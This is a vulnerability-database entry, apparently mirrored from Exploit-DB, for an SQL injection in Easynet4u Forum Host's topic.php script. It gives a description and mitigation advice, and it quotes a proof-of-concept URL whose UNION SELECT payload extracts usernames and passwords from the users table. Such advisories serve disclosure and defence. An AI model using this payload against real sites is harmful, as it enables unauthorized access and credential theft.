header-logo
Suggest Exploit
vendor:
Forum Host
by:
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Forum Host
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Easynet4u Forum Host SQL Injection Vulnerability

The Easynet4u Forum Host is vulnerable to an SQL injection attack due to insufficient sanitization of user-supplied data. An attacker can exploit this vulnerability by crafting a malicious request to the 'topic.php' script with a specially crafted 'topic' parameter. Successful exploitation can lead to compromise of the application, unauthorized access or modification of data, and exploitation of underlying database vulnerabilities.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38697/info

Easynet4u Forum Host is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/SCRIPT_PATH/topic.php?topic=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,password),5,6/**/FROM/**/users/*&forum=0